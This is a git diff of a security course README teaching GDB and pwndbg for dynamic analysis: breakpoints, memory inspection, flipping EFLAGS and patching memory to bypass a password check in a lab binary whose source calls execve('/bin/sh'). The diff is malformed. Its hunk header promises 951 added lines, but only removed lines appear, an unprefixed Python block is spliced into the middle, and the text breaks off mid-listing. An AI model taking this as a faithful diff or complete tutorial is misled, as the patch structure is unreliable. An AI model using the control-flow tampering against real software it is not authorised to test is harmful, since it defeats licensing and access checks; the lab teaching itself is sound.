diff --git a/chapters/binary-analysis/dynamic-analysis/reading/README.md b/chapters/binary-analysis/dynamic-analysis/reading/README.md
index d440878..f2a0731 100644
--- a/chapters/binary-analysis/dynamic-analysis/reading/README.md
+++ b/chapters/binary-analysis/dynamic-analysis/reading/README.md
@@ -1,951 +1,951 @@
-# Dynamic Analysis
-
-## Introduction
-
-### Objectives & Rationale
-
-The first part of this session will give you a walkthrough of the most common GDB principles that we are going to use in exploitation.
-In the second half, we are going to use these concepts in practice, to evade a basic key evaluation program.
-
-Black Box type analysis works best when standard algorithms are used in the program, such as: MD5, SHA1, RSA.
-We can change the input to a more suggestive one and use the output to estimate what function was used to convert it.
-
-Combined with behavioral analysis methods such as using sandboxes or strace/ltrace we can quickly map sections of code to functionalities.
-
-With dynamic analysis, packed malware can be extracted from memory in unpacked form, enabling us to continue static analysis on the complete binary.
-
-### Prerequisites
-
-In the current session we will use GDB extensively.
-We assume that you are familiar with its basic usage and will move on quickly to some of its more advanced features.
-
-To brush up on the GDB basics, read this [Refresher](https://security.cs.pub.ro/summer-school/wiki/session/04-gdb "session:04-gdb").
-
-The executable used in the demo is called sppb and is the challenge 1 binary.
-
-### Before GDB
-
-One thing you should always do before firing up GDB is to try to learn all the available information on the executable you're trying to debug through the techniques that have been presented so far.
-
-For the purposes of this session it is a good idea to always run `objdump` on all the executable files before attaching GDB to them so that you have a better idea of what goes where.
-
-```console
-objdump -M intel -d [executable]
-```
-
-## GDB Basic Commands
-
-### Getting help with GDB
-
-Whenever you want to find out more information about GDB commands feel free to search for it inside [the documentation](http://www.gnu.org/software/gdb/documentation/ "http://www.gnu.org/software/gdb/documentation/") or by using the `help` command followed by your area of interest.
-For example, help for the `disassemble` command can be obtained by running the following commands in GDB:
-
-```text
-# Print info about all help areas available.
-# Identify the area of your question.
-(gdb) help
-
-# Print info about available data commands.
-# Identify the command you want to learn more about.
-(gdb) help data
-
-# Print info about a specific command.
-# Find out more about the command you are searching for.
-(gdb) help disassemble
-```
-
-### Opening a program with GDB
-
-A program can be opened for debugging in a number of ways.
-We can run GDB directly attaching it to a program:
-
-```console
-gdb [executable-file]
-```
-
-Or we can open up GDB and then specify the program we are trying to attach to using the `file` or `exec-file` command:
-
-```console
-$ gdb
-(gdb) file [executable-file]
-```
-
-Furthermore we can attach GDB to a running service if we know its process id:
-
-```text
-gdb --pid [pid_number]
-```
-
-### Disassembling
-
-GDB allows disassembling of binary code using the `disassemble` command
-(it may be shortened to `disas`).
-The command can be issued either on a
-memory address or using labels.
-
-```text
-(gdb) disassemble *main
-Dump of assembler code for function main:
-   0x080491c9 <+0>:     push   ebp
-   0x080491ca <+1>:     mov    ebp,esp
-   0x080491cc <+3>:     push   ebx
-   0x080491cd <+4>:     sub    esp,0x4
-=> 0x080491d0 <+7>:     mov    eax,ds:0x804c030
-....Output omitted.....
-
-(gdb) disassemble 0x080491c9
-Dump of assembler code for function main:
-   0x080491c9 <+0>:     push   ebp
-   0x080491ca <+1>:     mov    ebp,esp
-   0x080491cc <+3>:     push   ebx
-   0x080491cd <+4>:     sub    esp,0x4
-=> 0x080491d0 <+7>:     mov    eax,ds:0x804c030
-```
-
-### Adding Breakpoints
-
-Breakpoints suspend the execution of the program being debugged at a chosen place.
-Adding breakpoints is done with the `break` command.
-A good idea is to place a breakpoint at the main function of the program you are trying to exploit.
-Given the fact that you have already run `objdump` and disassembled the program you know the address for the start of the main function.
-This means that we can set a breakpoint for the start of our program in two ways:
-
-```text
-(gdb) break *main (when the binary is not stripped of symbols)
-(gdb) break *0x[main_address_obtained_with_objdump] (when aslr is off)
-```
-
-The general format for setting breakpoints in GDB is as follows:
-
-```text
-(gdb) break [LOCATION] [thread THREADNUM] [if CONDITION]
-```
-
-Issuing the `break` command with no parameters will place a breakpoint at the current address.
-GDB allows using abbreviated forms for all the commands it supports.
-Learning these abbreviations comes with time and will greatly improve your work output.
-Always be on the lookout for abbreviated commands.
-
-The abbreviated command for setting breakpoints is simply `b`.
-
-### Listing Breakpoints
-
-At any given time all the breakpoints in the program can be displayed using the `info breakpoints` command:
-
-```text
-(gdb) info breakpoints
-```
-
-You can also issue the abbreviated form of the command:
-
-```text
-(gdb) i b
-```
-
-### Deleting Breakpoints
-
-Breakpoints can be removed by issuing the `delete breakpoints` command followed by the breakpoint's number, as it is listed in the output of the
-`info breakpoints` command.
-
-```text
-(gdb) delete breakpoints [breakpoint_number]
-```
-
-You can also delete all active breakpoints by issuing the `delete breakpoints` command with no parameters:
-
-```text
-(gdb) delete breakpoints
-```
-
-Once a breakpoint is set you would normally want to launch the program into execution.
-You can do this by issuing the `run` command.
-The program will start executing and stop at the first breakpoint you have set.
-
-```text
-(gdb) run
-```
-
-#### Execution Flow
-
-Execution flow can be controlled in GDB using the `continue`, `stepi` and `nexti` commands, as follows:
-
-```text
-(gdb) help continue
-# Continue program being debugged, after signal or breakpoint.
-# If proceeding from breakpoint, a number N may be used as an argument,
-# which means to set the ignore count of that breakpoint to N - 1 (so that the breakpoint won't break until the Nth time it is reached).
-
-(gdb) help stepi
-# Step one instruction exactly.
-# Argument N means do this N times (or till program stops for another reason).
-
-(gdb) help nexti
-# Step one instruction, but proceed through subroutine calls.
-# Argument N means do this N times (or till program stops for another reason).
-```
-
-You can also use the abbreviated format of the commands: `c` (`continue`), `si` (`stepi`), `ni` (`nexti`).
-
-If at any point you want to start the program execution from the beginning you can always reissue the `run` command.
-
-Another technique that can be used for setting breakpoints is using offsets.
-
-As you already know, each assembly instruction takes a certain number of bytes inside the executable file.
-This means that whenever you are setting breakpoints using offsets you must always set them at instruction boundaries.
-
-```text
-(gdb) break main
-Breakpoint 1 at 0x80491d0
-(gdb) run
-Starting program: sppb
-
-Breakpoint 1, 0x80491d0 in main ()
-(gdb) disassemble main
-Dump of assembler code for function main:
-   0x080491c9 <+0>:     push   ebp
-   0x080491ca <+1>:     mov    ebp,esp
-   0x080491cc <+3>:     push   ebx
-   0x080491cd <+4>:     sub    esp,0x4
-.....Output omitted.....
-(gdb) break *main+4
-Breakpoint 2 at 0x80491cd
-```
-
-### Examine and Print, Your Most Powerful Tools
-
-GDB allows examining memory locations, whether they are specified as addresses or stored in registers.
-The `x` command (for *examine*) is arguably one of the most powerful tools in your arsenal and the most common command you are going to run when exploiting.
-The format for the `examine` command is as follows:
-
-```text
-(gdb) x/nfu [address]
-  n: How many units to print
-  f: Format character
-     a Pointer
-     c Read as integer, print as character
-     d Integer, signed decimal
-     f Floating point number
-     i Instruction (read n assembly instructions from the specified memory address)
-     o Integer, print as octal
-     s Treat as C string (read all successive memory addresses until null character and print as characters)
-     t Integer, print as binary (t="two")
-     u Integer, unsigned decimal
-     x Integer, print as hexadecimal
-  u: Unit
-     b: Byte
-     h: Half-word (2 bytes)
-     w: Word (4 bytes)
-     g: Giant word (8 bytes)
-```
-
-In contrast with the examine command, which reads data at a memory location, the `print` command (shorthand `p`) prints out values stored in registers and variables.
-The format for the `print` command is as follows:
-
-```text
-(gdb) p/f [what]
-  f: Format character
-     a Pointer
-     c Read as integer, print as character
-     d Integer, signed decimal
-     f Floating point number
-     o Integer, print as octal
-     s Treat as C string (read all successive memory addresses until null character and print as characters)
-     t Integer, print as binary (t="two")
-     u Integer, unsigned decimal
-     x Integer, print as hexadecimal
-```
-
-For a better explanation please follow through with the following example:
-
-```text
-# A breakpoint has been set inside the program and the program has been run with the appropriate commands to reach the breakpoint.
-# At this point we want to see which are the following 10 instructions.
-(gdb) x/10i 0x80491cd
-   0x80491cd <main+4>:  sub    esp,0x4
-   0x80491d0 <main+7>:  mov    eax,ds:0x804c030
-   0x80491d5 <main+12>: push   0x0
-   0x80491d7 <main+14>: push   0x1
-   0x80491d9 <main+16>: push   0x0
-   0x80491db <main+18>: push   eax
-   0x80491dc <main+19>: call   0x8049080 <setvbuf@plt>
-
-# Let's examine the memory at 0x804a02a because we have a hint that this address holds one of the parameters of the scanf call as it is afterwards placed on the stack (we'll explain later how we have reached this conclusion).
-# The other parameter will be an address where the input will be stored.
-(gdb) x/s 0x804a02a
-0x804a02a: "%d"
-
-# We now set a breakpoint for *main+56.
-(gdb) break *0x08049201
-Breakpoint 3 at 0x08049201
-(gdb) continue
-Continuing.
-
-Breakpoint 3, 0x08049201 in main ()
-
-# We then record the value of the eax register somewhere and use nexti(ni) and then we input an integer.
-# Let's examine the address which we recorded earlier corresponding to the eax register (it should've held the address for the integer we input).
-# Take note that in GDB registers are preceded by the "$" character very much like variables.
-(gdb) x/d 0xffffcf70 <- (your address)
-0xffffcf70:
-# Now let's print the contents of the eax register as hexadecimal.
-(gdb) p/x $eax
-$1 =
-
-# The difference between p and x can be observed by issuing the following commands:
-x/s 0x804a030
-0x804a030: "Your password is: %d. Evaluating it...\n"
-
-p /s 0x804a030
-
-# $2 = 1920298841 which is the number in decimal format that "Your" can be translated to by its ascii codes (little endian so written as 0x72756F59).
-
-# In order to see the same result we must use the command p /s (char*)0x804a030 and dereference the pointer ourselves.
-# As you can see the address holds the memory for the beginning of the string.
-# This shows you how "x" interprets data from memory while "p" merely prints out the contents in the required format
-# You can think of it as "x" dereferencing while "p" not dereferencing
-```
-
-### GDB Command file
-
-When exploiting, there are a couple of commands that you will issue periodically and doing that by hand will get cumbersome.
-GDB commands files will allow you to run a specific set of commands automatically after each command you issue manually.
-This comes in especially handy when you're stepping through a program and want to see what happens with the registers and stack after each instruction is run, which is the main target when exploiting.
-
-The examine command only makes sense when code is already running on the machine, so inside the file we are going to use the `display` command, which produces the same output.
-
-In order to use this option you must first create your commands file.
-This file can include any GDB commands you like but a good start would be printing out the content of all the register values, the next ten instructions that are going to be executed, and some portion from the top of the stack.
-
-The reason for examining all of the above after each instruction is run will become clearer once we go through the second section of the session.
-
-Command file template:
-
-```text
-display/10i $eip
-display/x $eax
-display/x $ebx
-display/x $ecx
-display/x $edx
-display/x $edi
-display/x $esi
-display/x $ebp
-display/32xw $esp
-```
-
-In order to view all register values you could use the `x` command.
-However the values of all registers can be obtained by running the `info all-registers` command:
-
-```text
-(gdb) info all-registers
-eax            0x8048630    134514224
-ecx            0xbffff404   -1073744892
-edx            0xbffff394   -1073745004
-ebx            0xb7fc6ff4   -1208193036
-esp            0xbffff330   0xbffff330
-ebp            0xbffff368   0xbffff368
-esi            0x0          0
-edi            0x0          0
-eip            0x80484e9    0x80484e9
-eflags         0x286        [ PF SF IF ]
-cs             0x73         115
-ss             0x7b         123
-ds             0x7b         123
-es             0x7b         123
-fs             0x0          0
-gs             0x33         51
-st0            *value not available*
-st1            *value not available*
-st2            *value not available*
-st3            *value not available*
-st4            *value not available*
-st5            *value not available*
-st6            *value not available*
-st7            *value not available*
-fctrl          0x37f        895
-fstat          0x0          0
-ftag           0xffff       65535
-fiseg          0x0          0
-fioff          0x0          0
-foseg          0x0          0
----Type <return> to continue, or q <return> to quit---
-fooff          0x0          0
-fop            0x0          0
-mxcsr          0x1f80       [ IM DM ZM OM UM PM ]
-ymm0           *value not available*
-ymm1           *value not available*
-ymm2           *value not available*
-ymm3           *value not available*
-ymm4           *value not available*
-ymm5           *value not available*
-ymm6           *value not available*
-ymm7           *value not available*
-mm0            *value not available*
-mm1            *value not available*
-mm2            *value not available*
-mm3            *value not available*
-mm4            *value not available*
-mm5            *value not available*
-mm6            *value not available*
-mm7            *value not available*
-```
-
-One thing you might notice while using GDB is that addresses seem to be pretty similar between runs.
-Although with experience you will gain a better feel for where an address points to, one thing to remember at this point would be that stack addresses usually have the `0xbffff….` format.
-In order to run GDB with the commands file you have just generated, when launching GDB specify the `-x [command_file]` parameter.
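The commands file template can also be produced programmatically, which helps when the number of instructions or stack words to display changes often. The following is a minimal sketch in Python, assuming the same 32-bit register set as the template; the helper names (`build_command_file`, `write_command_file`) and the file name `commands.gdb` are hypothetical and are not part of GDB or of this session's materials.

```python
from pathlib import Path

# General-purpose registers listed in the template (32-bit x86).
REGISTERS = ["eax", "ebx", "ecx", "edx", "edi", "esi", "ebp"]


def build_command_file(instructions: int = 10, stack_words: int = 32) -> str:
    """Return the text of a GDB commands file made of `display` expressions."""
    # Next instructions starting at the instruction pointer.
    lines = [f"display/{instructions}i $eip"]
    # One hexadecimal display per register.
    lines += [f"display/x ${reg}" for reg in REGISTERS]
    # A window of 4-byte words from the top of the stack.
    lines.append(f"display/{stack_words}xw $esp")
    return "\n".join(lines) + "\n"


def write_command_file(path: str, **kwargs) -> Path:
    """Write the commands file to `path` (a hypothetical file name)."""
    target = Path(path)
    target.write_text(build_command_file(**kwargs))
    return target


if __name__ == "__main__":
    # Print the default template instead of touching the file system.
    print(build_command_file(), end="")
```

A file written with `write_command_file("commands.gdb")` could then be passed to GDB through the `-x` parameter, for example `gdb -x commands.gdb [executable-file]`.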
-
-### Using GDB to modify variables
-
-GDB can be used to modify variables during runtime.
-In the case of exploitation this comes in handy as the program can be altered at runtime with the purpose of changing the execution path to desired branches.
-
-## Pwndbg
-
-As you can see, using GDB can be cumbersome, which is why we recommend using the pwndbg plug-in.
-The tutorial as well as the repository of the project can be found here: [Pwndbg](https://github.com/pwndbg/pwndbg "https://github.com/pwndbg/pwndbg").
-
-Given the fact that pwndbg is just a wrapper, all the functionality of GDB will be available when running gdb with the `pwndbg` plug-in.
-Some of the advantages of using pwndbg include:
-
-- Automatic preview of registers, code and stack after each instruction (you no longer need to create your own commands file)
-- Automatic dereferencing and following through of memory locations
-- Color coding
-
-An alternative to pwndbg is [Gef](https://github.com/hugsy/gef "https://github.com/hugsy/gef").
-However, this tutorial is designed with Pwndbg in mind.
-
-#### Pwndbg Commands
-
-The `pdis` command gives a pretty output that is similar to what the `disas` command in GDB prints:
-
-```text
-Usage: pdis 0x80491d0
-```
-
-If `pdis` is used with an address as a parameter, the output will be similar to what `x/Ni` prints out.
-Usage: `pdis [address] [N]`, where N is the number of instructions you want to be printed.
-
-The `stepi` command has the same effect as in GDB. However, if you are running Pwndbg you will notice that after each step Pwndbg automatically prints the register values, several lines of code starting from the `eip`
-register and a portion of the stack:
-
-```text
-pwndbg> stepi
-
-LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
-────────────────────────────────────[ REGISTERS ]────────────────────────────────────
-*EAX 0xf7facd20 (_IO_2_1_stdout_) ◂— 0xfbad2084
- EBX 0x0
- ECX 0xa00af61b
- EDX 0xffffcfb4 ◂— 0x0
- EDI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c
- ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c
- EBP 0xffffcf78 ◂— 0x0
- ESP 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c
-*EIP 0x80491d5 (main+12) ◂— push 0 /* 'j' */
-─────────────────────────────────────[ DISASM ]──────────────────────────────────────
-   0x80491d0 mov eax, dword ptr [stdout@GLIBC_2.0] <0x804c030>
- ► 0x80491d5 push 0
-   0x80491d7 push 1
-   0x80491d9 push 0
-   0x80491db push eax
-   0x80491dc call setvbuf@plt
-
-   0x80491e1 add esp, 0x10
-   0x80491e4 mov dword ptr [ebp - 8], 0
-   0x80491eb push 0x804a010
-   0x80491f0 call puts@plt
-
-   0x80491f5 add esp, 4
-──────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────
-In file: /home/kali/Desktop/dokermaker/binary-internal/sessions/05-dynamic-analysis/activities/01-02-challenge-sppb/src/sppb.c
-    6 execve("/bin/sh", 0, 0);
-    7 }
-    8
-    9 int main()
-   10 {
- ► 11 setvbuf(stdout, NULL, _IOLBF, 0);
-   12 int readValue = 0;
-   13
-   14 printf("Please provide password: \n");
-   15 scanf("%d", &readValue);
-   16
-──────────────────────────────────────[ STACK ]──────────────────────────────────────
-00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c
-01:0004│ 0xffffcf74 ◂— 0x0
-02:0008│ ebp 0xffffcf78 ◂— 0x0
-03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10
-04:0010│ 0xffffcf80 ◂— 0x1
-05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb'
-06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0'
-07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0
-────────────────────────────────────[ BACKTRACE ]────────────────────────────────────
- ► f 0 0x80491d5 main+12
-   f 1 0xf7de0fd6 __libc_start_main+262
-
-```
-
-You can always use the following commands to obtain context at any given moment inside the debug process:
-
-- `context reg`
-- `context code`
-- `context stack`
-- `context all`
-
-One additional Pwndbg command which can be used to show values in registers is the `telescope` command.
-The command dereferences pointer values until it gets to a value and prints out the entire trace.
-
-The command can be used with both registers and memory addresses:
-
-```text
-pwndbg> telescope $esp
-00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c
-01:0004│ 0xffffcf74 ◂— 0x0
-02:0008│ ebp 0xffffcf78 ◂— 0x0
-03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10
-04:0010│ 0xffffcf80 ◂— 0x1
-05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb'
-06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0'
-07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0
-pwndbg> telescope 0xffffcf84
-00:0000│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb'
-01:0004│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0'
-02:0008│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0
-03:000c│ 0xffffcf90 —▸ 0xffffcfc4 ◂— 0xe38ae80b
-04:0010│ 0xffffcf94 —▸ 0xf7ffdb60 —▸ 0xf7ffdb00 —▸ 0xf7fc93e0 —▸ 0xf7ffd9a0 ◂— ...
-05:0014│ 0xffffcf98 —▸ 0xf7fc9410 —▸ 0x804832d ◂— 'GLIBC_2.0'
-06:0018│ 0xffffcf9c —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c
-07:001c│ 0xffffcfa0 ◂— 0x1
-```
-
-In the example above, the memory address 0x8048630 was loaded into EAX.
-That is why examining the register or the memory location gives the same output.
-
-For more information on various Pwndbg commands you can always visit the Pwndbg help through the `pwndbg` command.
-It is always a better idea to use Pwndbg commands when available.
-However, you should also know the basics of using GDB.
-
-#### Altering variables and memory with Pwndbg and GDB
-
-In addition to basic registers, GDB has three extra variables which map onto some of the existing registers, as follows:
-
-- `$pc - $eip`
-- `$sp - $esp`
-- `$fp - $ebp`
-
-In addition to these there is also a variable which can be used to view the processor state: `$ps - processor status`
-
-Values of memory addresses and registers can be altered at execution time.
-Because altering memory is a lot easier using Pwndbg we are going to use it throughout today's session.
-
-The easiest way of altering the execution flow of a program is editing the `$eflags` register just before jump instructions.
-
-Using GDB the `$eflags` register can be easily modified:
-
-```text
-pwndbg> reg eflags
-EFLAGS 0x282 [ cf pf af zf SF IF df of ]
-# Set the ZF flag
-pwndbg> set $eflags |= (1 << 6)
-# Clear the ZF flag
-pwndbg> set $eflags &= ~(1 << 6)
-```
-
-Notice that the flags that are set are printed in all-caps when the `reg eflags` command is issued.
-
-The `set` command (GDB native) can be used to modify values that reside inside memory.
-
-```text
-pwndbg> telescope 0x804a010
-00:0000│ 0x804a010 ◂— 'Please provide password: '
-01:0004│ 0x804a014 ◂— 'se provide password: '
-02:0008│ 0x804a018 ◂— 'rovide password: '
-03:000c│ 0x804a01c ◂— 'de password: '
-04:0010│ 0x804a020 ◂— 'assword: '
-05:0014│ 0x804a024 ◂— 'ord: '
-06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */
-07:001c│ 0x804a02c ◂— 0x0
-
-pwndbg> set {char [14]} 0x804a010 = "No pass here"
-pwndbg> telescope 0x804a010
-00:0000│ 0x804a010 ◂— 'No pass here'
-01:0004│ 0x804a014 ◂— 'ass here'
-02:0008│ 0x804a018 ◂— 'here'
-03:000c│ 0x804a01c ◂— 0x70200000
-04:0010│ 0x804a020 ◂— 'assword: '
-05:0014│ 0x804a024 ◂— 'ord: '
-06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */
-07:001c│ 0x804a02c ◂— 0x0
-```
-
-As you can see the string residing in memory at address `0x804a010` has been modified using the `set` command.
-
-Pwndbg does not offer enhancements in modifying register values.
-For modifying register values you can use the GDB `set` command.
-
-```text
-pwndbg> p/x $eax
-$10 = 0x1
-pwndbg> set $eax=0x80
-pwndbg> p/x $eax
-$11 = 0x80
-```
-
-## The Stack
-
-This section describes the process of calling a function in detail.
-Understanding function calling and stack operations during program execution is essential to exploitation.
-
-The stack is one of the areas of memory which gets the biggest attention in exploit writing.
-
-### Stack Growth
-
-The stack grows from high memory addresses to low memory addresses.
-
-```text
-pwndbg> pdis $eip
-
-   0x80491db push eax
-   0x80491dc call setvbuf@plt
-
-   0x80491e1 add esp, 0x10
-   0x80491e4 mov dword ptr [ebp - 8], 0
-   0x80491eb push 0x804a010
- ► 0x80491f0 call puts@plt
-
-pwndbg> p/x $esp
-$1 = 0xffffcf6c
-pwndbg> si
-0x8049050 in puts@plt ()
-pwndbg> p/x $esp
-$5 = 0xffffcf68
-```
-
-As you can see from the example above the `$esp` register had an initial value of `0xffffcf6c`.
-The next instruction that is about to be executed is a `call`, which pushes the return address (`0x80491f5`) on the stack.
-We execute the instruction and then reevaluate the value of `$esp`.
-As we can see `$esp` now points to `0xffffcf68` (`0xffffcf6c-0x4`).
-
-### Frame Pointers and Local Function Variables
-
-Whenever the processor enters a function, a special logical container is created on the stack for that function.
-
-This container is called a function frame.
-The idea behind it is that the processor must know which area of the stack belongs to which function.
-
-In order to achieve this logical segmentation a set of 2 instructions are automatically inserted by the compiler at the beginning of each function.
-Can you tell what they are based on the output below?
-
-```text
-pwndbg> break main
-Breakpoint 1 at 0x80491d0
-pwndbg> run
-[----------------------------------registers-----------------------------------]
- EAX 0xf7fa99e8 (environ) —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0'
- EBX 0x0
- ECX 0xb8a6a751
- EDX 0xffffcfb4 ◂— 0x0
- EDI 0x80490a0 (_start) ◂— xor ebp, ebp
- ESI 0x1
- EBP 0xffffcf78 ◂— 0x0
- ESP 0xffffcf70 ◂— 0x1
- EIP 0x80491d0 (main+7) ◂— mov eax, dword ptr [0x804c030]
-[-------------------------------------code-------------------------------------]
-   0x080491c9 <+0>:     push   ebp
-   0x080491ca <+1>:     mov    ebp,esp
-   0x080491cc <+3>:     push   ebx
-   0x080491cd <+4>:     sub    esp,0x4
-=> 0x080491d0 <+7>:     mov    eax,ds:0x804c030
-   0x080491d5 <+12>:    push   0x0
-   0x080491d7 <+14>:    push   0x1
-   0x080491d9 <+16>:    push   0x0
-   0x080491db <+18>:    push   eax
-
-[------------------------------------stack-------------------------------------]
-00:0000│ esp 0xffffcf70 ◂— 0x1
-01:0004│ 0xffffcf74 ◂— 0x0
-02:0008│ ebp 0xffffcf78 ◂— 0x0
-03:000c│ 0xffffcf7c —▸ 0xf7dda905 (__libc_start_main+229) ◂— add esp, 0x10
-04:0010│ 0xffffcf80 ◂— 0x1
-05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb'
-06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0'
-07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0
-
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-
-Breakpoint 1, 0x080491d0 in main ()
-pwndbg> disass password_accepted
-
-
-   0x080491b2 <+0>:     push   ebp
-   0x080491b3 <+1>:     mov    ebp,esp
-   0x080491b5 <+3>:     push   0x0
-   0x080491b7 <+5>:     push   0x0
-   0x080491b9 <+7>:     push   0x804a008
-   0x080491be <+12>:    call   0x8049070
-   0x080491c3 <+17>:    add    esp,0xc
-   0x080491c6 <+20>:    nop
-   0x080491c7 <+21>:    leave
-   0x080491c8 <+22>:    ret
-
-```
-
-What we did is we created a breakpoint for the start of the main function and then ran the program.
-As you can see the first 2 instructions that got executed were `push ebp` and `mov ebp,esp`.
-
-We then set a breakpoint for another function called `password_accepted`, continued execution and entered a password that we know is going to pass validation.
-Once the breakpoint is hit, we can see the same 2 instructions `push ebp` and `mov ebp,esp`.
-
-The two instructions which can be noticed at the beginning of any function are the instructions required for creating the logical container for each function on the stack.
-
-In essence what they do is save the reference of the old container (`push ebp`) and record the current address at the top of the stack as the beginning of the new container (`mov ebp,esp`).
-
-For a visual explanation please see below:
-

-[Figure: function frames on the stack; image not available]

-
-As you can see the EBP register always points to the stack address that corresponds to the beginning of the current function's frame.
-That is why it is most often referred to as the frame pointer.
-
-In addition to the two instructions required for creating a new stack frame for a function, there are a couple more instructions that you will usually see at the beginning of a function.
-
-If you analyze the instructions at the beginning of main, you can spot these as being:
-
-- An `and esp,0xfffffff0` instruction.
-
-- A `sub` instruction that subtracts a hex value from ESP.
-
-The first of the two instructions has the purpose of aligning the stack to a specific address boundary.
-This is done to increase processor efficiency.
-In our specific case, the top of the stack gets aligned to a 16-byte boundary.
-
-One of the purposes of the stack inside functions is that of offering address space in which to place local variables.
-The second instruction preallocates space for local function variables.
-
-Let's see how local variables are handled inside assembly code.
-
-```c
-#include <stdio.h>
-int main()
-{
-    int a;
-    a=1;
-    return 0;
-}
-```
-
-```text
-kali@kali:~/sss$ gdb test
-GNU gdb (Ubuntu/Linaro 7.4-2012.02-0ubuntu2) 7.4-2012.02
-Copyright (C) 2012 Free Software Foundation, Inc.
-License GPLv3+: GNU GPL version 3 or later
-This is free software: you are free to change and redistribute it.
-There is NO WARRANTY, to the extent permitted by law. Type "show copying"
-and "show warranty" for details.
-This GDB was configured as "i686-linux-gnu".
-For bug reporting instructions, please see:
-...
-Reading symbols from /home/dgioga/sss/test...(no debugging symbols found)...done.
-pwndbg> break main
-Breakpoint 1 at 0x80483ba
-pwndbg> run
-[----------------------------------registers-----------------------------------]
-EAX: 0x1
-EBX: 0xb7fc6ff4 --> 0x1a0d7c
-ECX: 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test")
-EDX: 0xbffff3a4 --> 0xb7fc6ff4 --> 0x1a0d7c
-ESI: 0x0
-EDI: 0x0
-EBP: 0xbffff378 --> 0x0
-ESP: 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>: add ebx,0x1c1b)
-EIP: 0x80483ba (<main+6>: mov DWORD PTR [ebp-0x4],0x1)
-EFLAGS: 0x200282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
-[-------------------------------------code-------------------------------------]
-   0x80483b4 <main>:    push   ebp
-   0x80483b5 <main+1>:  mov    ebp,esp
-   0x80483b7 <main+3>:  sub    esp,0x10
-=> 0x80483ba <main+6>:  mov    DWORD PTR [ebp-0x4],0x1
-   0x80483c1 <main+13>: mov    eax,0x0
-   0x80483c6 <main+18>: leave
-   0x80483c7 <main+19>: ret
-   0x80483c8:           nop
-[------------------------------------stack-------------------------------------]
-0000| 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>: add ebx,0x1c1b)
-0004| 0xbffff36c --> 0xb7fc6ff4 --> 0x1a0d7c
-0008| 0xbffff370 --> 0x80483d0 (<__libc_csu_init>: push ebp)
-0012| 0xbffff374 --> 0x0
-0016| 0xbffff378 --> 0x0
-0020| 0xbffff37c --> 0xb7e3f4d3 (<__libc_start_main+243>: mov DWORD PTR [esp],eax)
-0024| 0xbffff380 --> 0x1
-0028| 0xbffff384 --> 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test")
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-
-Breakpoint 1, 0x080483ba in main ()
-```
-
-As you can see the operations that relate to the stack are:
-
-- The old frame pointer is saved.
-- EBP takes the value of ESP (the frame pointer is set to point to the current function's frame).
-- `0x10` is subtracted from ESP (reserve space for local variables).
-- The value `0x01` is placed at the address of EBP-0x4 (the local variable `a` takes the value 1).
-
-### Function Parameters
-
-The stack is also used to pass in parameters to functions.
-
-In the process of calling a function we can define two entities:
-the callee (the function that gets called) and the caller (the function that calls).
-
-When a function is called, the caller pushes the parameters for the callee on the stack.
-The parameters are pushed in reverse order.
-
-When the callee wants to get access to the parameters it was called with, all it needs to do is access the area of the stack that is higher up in reference to the start of its frame.
-
-At this point it makes sense to remember the following cases:
-
-- When EBP+value is referred to it is generally a referral to a parameter passed in to the current function.
-- When EBP-value is referred to it is generally a referral to a local variable.
-
-Let's see how this happens with the following code:
-
-```c
-#include <stdio.h>
-
-int add(int a, int b)
-{
-    int c;
-    c=a+b;
-    return c;
-}
-
-int main()
-{
-    add(10,3);
-    return 0;
-}
-```
-
-```text
-pwndbg> pdis 0x080483ca
-Dump of assembler code for function main:
-   0x080483ca <+0>:     push ebp #save the old frame pointer
-   0x080483cb <+1>:     mov ebp,esp #create the new frame pointer
-   0x080483cd <+3>:     sub esp,0x8 #create space for local variables
-   0x080483d0 <+6>:     mov DWORD PTR [esp+0x4],0x3 #place the last parameter (b=3) of the function that is to be called on the stack
-   0x080483d8 <+14>:    mov DWORD PTR [esp],0xa #place the first parameter (a=10) of the function that is to be called on the stack
-   0x080483df <+21>:    call 0x80483b4 <add> #call the function
